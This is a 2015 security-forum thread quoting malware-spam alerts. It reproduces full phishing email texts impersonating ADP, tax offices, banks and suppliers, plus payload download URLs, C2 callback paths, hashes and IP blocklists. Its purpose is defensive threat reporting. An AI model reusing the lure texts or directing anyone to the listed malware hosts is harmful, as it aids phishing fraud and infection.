27 Mar 2015 - "'UK Fuels ebill for ISO Week 201512' pretending to come from invoices@ ebillinvoice .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/UK-Fuels-ebill-for-ISO-Week-201512.png
27 March 2015 : 22328_201512.doc
Current Virus total detections: 3/57* | 2/56** | 2/57*** | 3/57****
... So far I have seen 4 versions of this malware, but previous campaigns over the last few weeks have delivered 2, 3 or even up to 10 or 12 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c6044a0cb8c2d1f8555939864d6e4008edf7ef81de34e94156d9529a3788127f/analysis/1427446840/
** https://www.virustotal.com/en/file/b4319a6f2bc4b60783e83a169b73a3705aabbe6ac70320bb554cd2da4528d243/analysis/1427447362/
*** https://www.virustotal.com/en/file/98996970e7a80c7d049a06205a026ccbbb3b42fa5c365a7b46df651846b41c32/analysis/1427447494/
**** https://www.virustotal.com/en/file/a934018b9b6ff900b391d18b4e9432b1d1322f6ca3bf08ca152472cc144560db/analysis/1427447285/
___
Fake 'NASA MSBA' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nasa-msba-27th-2015-fake-pdf-malware/
27 Mar 2015 - "'NASA MSBA 27th, 2015' pretending to come from MSBA <NVDB@ nasa .gov> with a zip attachment is another one from the current bot runs... The email looks like:
Good Afternoon.
MSFC has posted the upcoming MSBA 27th event on NAIS and
Fed Biz Ops (Solicitation No.: SB-85515).
NAIS Posting:
Please click on
Mod. 1 Posting.
Attached is the MSBA Agenda.
Please join us for this event!
27 March 2015: Random zip name: Extracts to: MSFC.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ee6869fb6d83e858fdb35d4015209b35901ed2f1de4e2d29f5e0dc994e609ee3/analysis/1427455905/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
___
Fake 'ADP Payroll Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-payroll-invoice-for-week-ending-03272015-fake-pdf-malware/
27 Mar 2015 - "'ADP Payroll Invoice for week ending 03/27/2015' pretending to come from user <run.payroll.invoice@ adp .com> with a zip attachment is another one from the current bot runs... The email looks like:
Your ADP Payroll invoice for last week is attached for your review. If
you have any questions regarding this invoice, please contact your ADP
service team at the number provided on the invoice for assistance.
Thank you for choosing ADP Payroll.
Important: Please do not respond to this message. It comes from an
unattended mailbox.
27 March 2015: random attachment zip name: Extracts to: ADP.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/87072346dc86a5094b2b0776087e1d2ec817a3ffb65b0f1332562ce251628a32/analysis/1427467488/
___
Fake 'Information Request' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nicksen-stone-information-request-fake-pdf-malware/
27 Mar 2015 - "'Information Request' pretending to come from Nicksen Stone <sale20@ thrivigor .com> with a zip attachment is another one from the current bot runs...
Hello,
We specialize in designing and manufacturing high quality metal and
plastic parts suitable for electronic,industrial,agricultural and
various applications.
If you need any parts please feel free to send us drawing or sample for
free quotes. Thank you.
With Kind Regards,
Nicksen Stone, Director
Ningbo Efforteam Machinery Co.,Ltd
Phone: +86-13777 101 355
27 March 2015: Random attachment zip name: Extracts to: Information.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/66bbe7a968b41adbf5c391f0c02aba85ac3309513f22e7a773969b6825e6fc51/analysis/1427472615/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
66.147.244.169: https://www.virustotal.com/en/ip-address/66.147.244.169/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
:fear::fear: :mad:
AplusWebMaster
2015-03-30, 15:38
FYI...
Fake 'Vistaprint Invoice' SPAM - pdf malware
- http://myonlinesecurity.co.uk/vistaprint-vat-invoice-fake-pdf-malware/
30 Mar 2015 - "'Vistaprint VAT Invoice' (random number) pretending to come from Vistaprint <VistaPrint-cc@ vistaprint .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Vistaprint-VAT-Invoice.png
30 March 2015: Random Attachment zip name: Extracts to: Invoice_1.exe
Current Virus total detections: 1/56* ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/135dbe562db4f5ddd3bc6d7e49460197cf5487a904efc393dd7a8a3876860d68/analysis/1427714331/
___
Fake 'ADP invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-for-week-ending-30032015-fake-pdf-malware/
30 Mar 2015 - "'ADP invoice for week ending 30/03/2015' pretending to come from Wilbert.Downs@ adp .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/ADP-invoice-for-week-ending.png
30 March 2015: invoice_285699291.zip: Extracts to: invoice_285699291.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f3ee72113a3e153ee1fd078e2e5bd2c5617a29d77ba62af7d383d61d29ba74bc/analysis/1427728309/
___
Fake 'PDF SWIFT TT COPY' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pdf-swift-tt-copy-fake-pdf-malware/
30 Mar 2015 - "'PDF SWIFT TT COPY' pretending to come from soumiya@ ulckuwait .com with a zip attachment is another one from the current bot runs... The email looks like:
Hello,
Regarding payments for the outstanding, our accounting department have
approved immediate payment to your accounts.
Please attached is the Payment confirmation slip ,Kindly help reply
urgently to confirm to us
Best Regards,
Kosta Curic
EVRO – TURS DOO
Požeška 80, Beograd, Srbija
Jenneth Setu
Purchase Manager
30 March 2015: Payment Confirmation pdf.zip: Extracts to: Payment Confirmation pdf.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3e4001f856343a0d6fb685e85658ddd524491c05de63df1634b6d6f04a723b33/analysis/1427732925/
___
Fake 'Quotation' SPAM - PDF malware
- http://myonlinesecurity.co.uk/mark-kemsley-quotation-qzvnvm-fake-pdf-malware/
30 Mar 2015 - "'Quotation qzVNVm: (random characters)' pretending to come from Mark Kemsley <mark.kemsley@ energy-solutions .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/quotation.png
30 March 2015 : random Attachment zip name: Extracts to: Quotation.exe
Current Virus total detections: 5/50* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1a56353bf1cb73db3a72832f8f8255f500f4a41bbab18203d7e37f349eed789f/analysis/1427738877/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
79.133.196.204: https://www.virustotal.com/en/ip-address/79.133.196.204/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
:fear: :mad:
AplusWebMaster
2015-03-31, 15:22
FYI...
Fake 'PO' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/your-po-sp14619-new-era-contract-sales-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "'Your PO: SP14619' pretending to come from Sam S. <sales@ alicorp .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-PO-SP14619.png
31 March 2015 : APIPO1.doc - Current Virus total detections: 3/52* | 5/57**
... at least one of the macros downloads http ://probagep.sandbox.proserver .hu/54/78.exe (Virus Total***)... previous campaigns over the last few weeks have delivered 2 or 3 or even up to 10 or 12 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/323858d729f1b817e46ba5611dcc3db4f75ab5aff755816ac0f3377fe00ad205/analysis/1427789087/
** https://www.virustotal.com/en/file/978632b2fdf4f7e360cc797538b69ca066f75369afeef1796dabdadcf71ff1cb/analysis/1427789118/
*** https://www.virustotal.com/en/file/8915e7dbb54828092c498ec868aa5e02485e6f229b513ad901223fd7d36620ee/analysis/1427788227/
- http://blog.dynamoo.com/2015/03/malware-spam-your-po-sp14619-sam-s.html
31 Mar 2015
... Recommended blocklist:
___
Fake 'Latest Docs' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/your-latest-documents-from-rs-components-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "'Your Latest Documents from RS Components' coming from random names at random companies with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-Latest-Documents-from-RS-Components.png
31 March 2015: G-A7835690138927462557376-1.doc - Current Virus total detections: 0/56*
... only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 or even 10 or 12 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1560f91fb7a024b3ba2e934c8cbcdb5cb2a1c4e41e7e8690ff3a7d952f0d7937/analysis/1427798514/
- http://blog.dynamoo.com/2015/03/malware-spam-83433-your-latest.html
31 Mar 2015
... Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169 "
___
Fake 'Passport Copy' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/fw-passport-copy-humdsolicitors-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "FW: Passport copy pretending to come from salim@ humdsolicitors .co.uk with what is supposed to be a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Passport-copy.png
31 March 2015 : passport.doc ...
- http://blog.dynamoo.com/2015/03/malware-spam-fw-passport-copy.html
31 Mar 2015 - "This fake legal spam comes with a malicious attachment. It appears to be a forwarded message from a solicitors office, but it is just a simple forgery... The attachment is named passport.doc. It is exactly the -same- malicious payload as the one used in this spam run earlier today*, and it drops the Dridex banking trojan on the victim's PC."
* http://blog.dynamoo.com/2015/03/malware-spam-your-po-sp14619-sam-s.html
___
Fake 'Debit Note' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/debit-note-97808-information-attached-to-this-email-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "'Debit Note [random numbers]' information attached to this email coming from random name and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a completely -blank- body...
31 March 2015 : random name .doc - Current Virus total detections: 0/56* | 0/56** | 0/56*** ..."
* https://www.virustotal.com/en/file/bacb4de5ae01f2fcc3a080633feb856597d2b388205217756b8c5e3a50c041db/analysis/1427808913/
** https://www.virustotal.com/en/file/715852e4d27665050e48ec7bc1b5838aa27f986918c215b3c906d0f07d6dd3ea/analysis/1427807988/
*** https://www.virustotal.com/en/file/c5cc2f88fef95f658c90f8a1e3518d75b15b504d8a184fd100d458e8891f6dd1/analysis/1427808948/
- http://blog.dynamoo.com/2015/03/malware-spam-debit-note-12345.html
31 Mar 2015 - "This fake financial spam comes with a malicious attachment. There is -no- body text... The executable downloaded is identical to the one used in this spam run* also taking place today. The payload is the Dridex banking trojan."
* http://blog.dynamoo.com/2015/03/malware-spam-83433-your-latest.html
___
Fake 'Your returns label' SPAM – PDF malware
- http://myonlinesecurity.co.uk/collectplus-your-returns-label-fake-pdf-malware/
31 Mar 2015 - "'CollectPlus :: Your returns label' pretending to come from info <info@ collectplus .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/CollectPlus-Your-returns-label.png
31 March 2015 : Random Attachment zip name: Extracts to: Reference.exe
Current Virus total detections: 3/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9f70dc57429e9af040890c2839f0e3c318432c6c9fd8c41d9277a64f19f4127/analysis/1427800182/
___
World Back Up Day ...
- https://blog.malwarebytes.org/news/2015/03/world-back-up-day-file-safety-first/
Mar 31, 2015 - "If your response to the question “When did you last back up?” is something to do with parking your car, then you should really take note of World Back Up Day*...
* http://www.worldbackupday.com/en/
According to the World Back Up Day statistics:
• 30% of people have never backed up their data.
• 113 phones are stolen / lost every minute (Ouch. You may want to invest in some remote wipe technology too).
• 29% of data deletion disasters are caused by accident..."
:fear: :mad:
AplusWebMaster
2015-04-01, 13:47
FYI...
Fake 'Tax Refund' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-australian-taxation-office.html
1 Apr 2015 - "This fake tax notification spam leads to malware hosted on Cubby.
From: Australian Taxation Office [noreply@ ato .gov .au]
Date: 1 April 2015 at 00:51
Subject: Australian Taxation Office - Refund Notification
IMPORTANT NOTIFICATION
Australian Taxation Office - 31/03/2015
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2307.15 AUD.
To view/download your tax notification please click here or follow the link below :
https ://www .ato .gov .au/AZItems.aspx?id=3673&category=Tax+legislation+and+regulations&sorttype=azindexdisplay&Disp=True?NotificationCode=notification_0354003
Laurence Thayer, Tax Refund Department Australian Taxation Office
The names and the numbers -change- from email to email. Despite the displayed URL in the message, the link actually goes to cubbyusercontent .com (e.g. https ://www.cubbyusercontent .com/pl/RYR5601763.zip/_33cdead4ebfe45179a32ee175b49c399) but these download locations don't last very long as there is a quota on each download. In this case, the downloaded file is RYR5601763.zip which contains a malicious executable RYR5601763.scr which has a VirusTotal detection rate of 20/57*. Automated analysis tools... show that it downloads components from:
ebuyswap .co.uk/mandoc/muz3.rtf
eastmountinc .com/mandoc/muz3.rtf
It then attempts to phone home to:
141.105.141.87:13819/3103us13/HOME/41/7/4/
That IP is allocated to Makiyivka Online Technologies Ltd in Ukraine. In addition, it looks up the IP address of the computer at checkip .dyndns .org. Although this is benign, monitoring for it can be a good indicator of infection. These URL requests are typical of the Upatre downloader. According to the Malwr report it drops another binary jydemnr66.exe with a detection rate of 11/55** plus a benign PDF file entitled "War by remote control" which acts as some sort of cover for the infection process.
Recommended blocklist:
141.105.140.0/22
ebuyswap .co.uk
eastmountinc .com "
* https://www.virustotal.com/en/file/7ac09282cc511758e59c72521151071b3feef7824aa25be51cb0e640ed747d98/analysis/1427874847/
** https://www.virustotal.com/en/file/08ad3d332bca4444de8a05429b3925edafd83be61b0dd57a76e73207bec19981/analysis/1427876163/
___
Fake 'Delivery Note' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/cih-delivery-note-0051037484-word-doc-or-excel-xls-spreadsheet-malware/
1 Apr 2015 - "'CIH Delivery Note 0051037484' pretending to come from Batchuser BATCHUSER <ecommsupport@ cihgroup .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD
1 April 2015 :CIH Delivery Note 0051037484.doc
Current Virus total detections: 0/56* | 0/56** | 0/56*** | 0/56****
So far I have seen 4 versions of this malware... some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8cfb304671aef3b130f7c29ceb5d716c2ca5ecaae76be25370e66845506c5147/analysis/1427875359/
** https://www.virustotal.com/en/file/8cfb304671aef3b130f7c29ceb5d716c2ca5ecaae76be25370e66845506c5147/analysis/1427875359/
*** https://www.virustotal.com/en/file/11f7086034738b883874ecf9ba2c065df062996853d4cad262bdef67bfc62441/analysis/1427875320/
**** https://www.virustotal.com/en/file/672bb3708f164e3fc7d82c559edb71c081b74c65b3b55d49575a0510bc14169f/analysis/1427875511/
- http://blog.dynamoo.com/2015/04/malware-spam-batchuser-batchuser.html
1 Apr 2015 - "The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment...
Recommended blocklist:
..."
___
Fake 'Sales_Order' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/sales_order_6100152-kosnic-com-hazel-gough-word-doc-or-excel-xls-spreadsheet-malware/
1 Apr 2015 - "'Sales_Order_6100152' pretending to come from Hazel Gough <hazel.gough@ kosnic .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Sales_Order_6100152.png
1 April 2015 : Sales_Order_6100152.doc ... same malware although renamed as today’s CIH Delivery Note 0051037484 – word doc or excel xls spreadsheet malware*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/cih-delivery-note-0051037484-word-doc-or-excel-xls-spreadsheet-malware/
___
Fake 'Unpaid Invoice' SPAM - vbs malware
- http://myonlinesecurity.co.uk/unpaid-invoice-id99846-or-this-is-your-remittance-advice-id98943-all-random-id-numbers-vbs-malware/
1 Apr 2015 - "'Unpaid Invoice or This is your Remittance Advice [ID:98943]' (all random ID numbers) coming from -random- email addresses, persons and companies with a zip attachment is another one from the current bot runs... The attachments on these are so tiny at less than 1kb in size, that users will be easily fooled into thinking that they are harmless. The zips contain an encoded vbs script... The email body is totally -blank- ...
1 April 2015: Random Attachment zip name: Extracts to: 83JHE76328475243920_1a.doc.vbs
Current Virus total detections: 0/58*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/95d8ece0a7f56f84b4a16c1e461d1c72a92b06ca5a61ade3ce58f8138ee806a8/analysis/1427886418/
- http://blog.dynamoo.com/2015/04/malware-spam-unpaid-invoice-09876.html
1 Apr 2015 - "... has -no- body text and comes from random senders... It has a ZIP attachment which contains... a malicious VBS script... very similar to the VBA macro used in this spam run yesterday:
> http://blog.dynamoo.com/2015/03/malware-spam-83433-your-latest.html
This binary has a detection rate of 4/55*..."
* https://www.virustotal.com/en/file/c6aa69524212e81a8c5e32287437c803d27b789abcf4d01da9b66f7826ed5254/analysis/1427886150/
... Behavioural information
TCP connections
188.120.225.17: https://www.virustotal.com/en/ip-address/188.120.225.17/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
___
Fake 'Remittance' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-remittance-advice-word-doc-or-excel-xls-spreadsheet-malware/
1 Apr 2015 - "'Your Remittance Advice NB PRIVATE EQUITY PARTNERS LTD' (the company name is totally random but matches the name in the body) coming from random email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The attachment name matches the advice in the body and looks like:
Dear sir or Madam,
Please find attached a remittance advice (ZL147QNXM.doc) for your information.
Should you need any further information, please do not hesitate to contact us.
Best regards
NB PRIVATE EQUITY PARTNERS LTD
1 April 2015 : ZL147QNXM.doc - Current Virus total detections: 1/57*
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/59a6d8247c2cf78a7300d091f4f4bb201dd142454610824158dd3cecf42d8b1b/analysis/1427895461/
- http://blog.dynamoo.com/2015/04/malware-spam-your-remittance-advice.html
1 Apr 2015 - "... Recommended blocklist:
..."
___
Fake 'o/s invoices' SPAM – PDF malware
- http://myonlinesecurity.co.uk/van-sweringen-os-invoices-lisa-anderson-fake-pdf-malware/
1 Apr 2015 - "'Van Sweringen o/s invoices' pretending to come from Lisa Anderson <landerson@ homewatchcaregivers .com> with a zip attachment is another one from the current bot runs... The email looks like:
Outstanding invoices attached!
Thank you!
Lisa
Lisa J. Anderson/Office Manager
Homewatch CareGivers of
23811 Chagrin Blvd. Suite 114
Beachwood, OH 44122 ...
1 April 2015: 6100_NULGE.zip : Extracts to: en_en.exe
Current Virus total detections: 9/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0261a0a211d0baffb29712baeb40bfebe8685c9be6346b5e00eaaae9ea045218/analysis/1427902354/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/ <<<
94.23.6.64: https://www.virustotal.com/en/ip-address/94.23.6.64/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/ <<<
___
Xtube Exploit leads to Cryptowall Malware
- https://blog.malwarebytes.org/intelligence/2015/03/xtube-exploit-led-to-cryptowall-malware/
31 Mar 2015 - "We wrote about the adult site xtube .com being compromised -redirecting- visitors to a landing page for the Neutrino Exploit kit last week*... The malware that dropped from the exploit was found here** and was called xtube.exe... All user files are encrypted using “RSA-2048” encryption. In order to pay the -ransom- victims are instructed to visit paytoc4gtpn5cz12.torconnectpay .com. A separate address is also provided over the tor network:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/HELP_DECRYPT.png
... 'always good to remember that highly ranked websites (including adult content) are a prime target for hackers due to the traffic they get..."
* https://blog.malwarebytes.org/exploits-2/2015/03/adult-site-xtube-serves-malware-via-neutrino-ek/
** https://www.virustotal.com/en/file/c4db759ef1dc9d4d8ca8e776fa7d2e4bdc91e7d8d91a2466121c7b72c45e1357/analysis/
... Behavioural information
TCP connections
188.165.164.184: https://www.virustotal.com/en/ip-address/188.165.164.184/information/
93.185.106.78: https://www.virustotal.com/en/ip-address/93.185.106.78/information/
- http://blog.trendmicro.com/trendlabs-security-intelligence/crypto-ransomware-sightings-and-trends-for-1q-2015/
April 1, 2015 - "Since the start of 2015, we have spotted several variants of crypto-ransomware plague the threat landscape. In January, the Australia-New Zealand region was beset by variants of TorrentLocker. But we soon discovered that TorrentLocker infections were -not- limited to that region; Turkey, Italy, and France were also affected by this malware. We soon came across an “improved” version of CTB-Locker Ransomware, which now offered a “free decryption” service, an extended deadline to decrypt the files, and an option to change the language of the ransom message. We also saw attacks that combined crypto-ransomware with information-stealing malware. These latest crypto-ransomware variants bring their own tactic to ensure their victims pay the price..."
(More detail at the trendmicro URL above.)
:fear::fear: :mad:
AplusWebMaster
2015-04-02, 14:44
FYI...
Fake 'Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/invoice-attached-kayel-brewery-supplies-gary-laker-word-doc-or-excel-xls-spreadsheet-malware/
2 Apr 2015 - "'Invoice Attached' pretending to come from Kayel Brewery Supplies <sales@ kayel .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Invoice-Attached.png
23 April 2015 : I32230.doc - Current Virus total detections: 2/57* | 2/56**
... at least one of the macros downloads http ://WORKSPACECEGLARSKI .COM/025/42.exe ... 2 versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it...."
* https://www.virustotal.com/en/file/7fef88dfa4fbdd7c5373aa88a4289790527c7098db94ea6f9de2b2cbc20ecb9d/analysis/1427962106/
** https://www.virustotal.com/en/file/352a6804f3bdade9f620e33ed79c7340530ee3254a223d2061a8240c4443c624/analysis/1427962238/
___
Fake 'P.O.' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/purchase-order-4390-r-tech-welding-dylan-emery-word-doc-or-excel-xls-spreadsheet-malware/
2 Apr 2015 - "'Purchase Order 4390' pretending to come from Sales R-Tech <sales@ r-techwelding .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Purchase-Order-4390-1024x738.png
2 April 2015 : Purchase Order 4390.doc* ... same malware and download locations as today’s other macro malware downloaders Invoice Attached Kayel Brewery Supplies Gary Laker – word doc or excel xls spreadsheet malware* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/invoice-attached-kayel-brewery-supplies-gary-laker-word-doc-or-excel-xls-spreadsheet-malware/
___
Fake 'Purchase Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/medico-legal-report-expert-purchase-invoice-dasmedical-fake-pdf-malware/
2 Apr 2015 - "'[426168]( random) Medico-Legal Report Expert Purchase Invoice' pretending to come from case <case@ dasmedical .co.uk> with a zip attachment is another one from the current bot runs... The email looks like:
Please find the attached documents
1. The expert Purchase Invoice.
2 April 2015: 426168_Y8b4fBMdb_551D0159.F9F84862@ ....co.uk.zip: Extracts to: invoice.exe
Current Virus total detections: 2/56* ... another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/010ae3e096446d50fadc93054eabf0601711e92afd9373cae18776656ea9873b/analysis/1427967925/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
199.189.85.156: https://www.virustotal.com/en/ip-address/199.189.85.156/information/
___
Fake 'bank invoice' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-invoicebanklineulsterbanki.html
2 Apr 2015 - "This fake banking email leads to malware.
From: invoice@ bankline.ulsterbank .ie [invoice@ bankline .ulsterbank.ie]
Date: 2 April 2015 at 11:46
Subject: Outstanding invoice
Dear [victim],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here
I would be grateful if you could look into this matter and advise on an expected payment date .
Courtney Mason
Credit Control
Tel: 0845 300 2952
The link in the email leads to a download location at hightail .com (the sample I saw downloaded from https ://www.hightail .com/download/e?phi_action=app/directDownload&fl=SWhZekZucVhVbTlFQlFJWjA4bnVnVE9yZWt5UmdteDRsUjJuWENHRzVZbz0) which is a file called Doc_0062119-LQ.zip which in turn contains the malicious executable Doc_0062119-LQ.scr.
The executable has a VirusTotal detection rate of 3/57* and has characteristics that identify it as Upatre. Automated analysis tools... show that it downloads additional components from:
eduardohaiek .com/images/wicon1.png
edrzambrano .com.ve/images/wicon1.png
It also POSTs data to 141.105.141.87 (Makiyivka Online Technologies Ltd, Ukraine) in a characteristic Upatre manner:
http ://141.105.141.87 :13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
According to the Malwr report, the downloader drops a file gkkjxyz22.exe which has a detection rate of 2/57**. This is probably the Dyre banking trojan.
Recommended blocklist:
141.105.140.0/22
eduardohaiek .com
edrzambrano .com
MD5s:
4c666564c1db6312b9f05b940c46fa9a
876900768e06c3df75714d471c192cc6 "
* https://www.virustotal.com/en/file/d7720a995dab294e18ad74b25432d6af088763cc3c5c9408d997bf950f6fb04f/analysis/1427971860/
** https://www.virustotal.com/en/file/a4709678e1ac21b33a11012ebf1ad8638ed9c687c39a7d0f0d8ead87a14b4692/analysis/1427972349/
___
Fake 'scanned docs' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-scanned-document-from.html
2 Apr 2015 - "These fake scanner emails follow a well-established pattern. Instead of containing a scanned document they have a malicious attachment.
From: Cindy Pate [Caroline.dfd@ flexmail .eu]
Date: 2 April 2015 at 11:09
Subject: Scanned document from HP Scanner [66684798]
Reply to: HP-Scanner@ flexmail .eu
Model:KX-240NGZDC
Location: 1st Floor Office
File Format: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document...
I have seen three different malicious attachments with low detection rates... which appear to contain one of two macros... which download a further component from one of the following locations:
http ://93.158.117.163 :8080/bz1gs9/kansp.jpg
http ://78.47.87.131 :8080/bz1gs9/kansp.jpg
Those servers are almost definitely malicious in other ways, the IPs are allocated to:
93.158.117.163 (Aitos Svenska / Port80 , Sweden)
78.47.87.131 (Hetzner, Germany)
This is then saved as %TEMP%\sdfsdffff.exe ... Although the automated tools indicate that no files were dropped, the payload for this is almost definitely Dridex.
Recommended blocklist:
..."
___
Fake 'Snap on Tools invoice copies' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-copy-invoices-snap-on.html
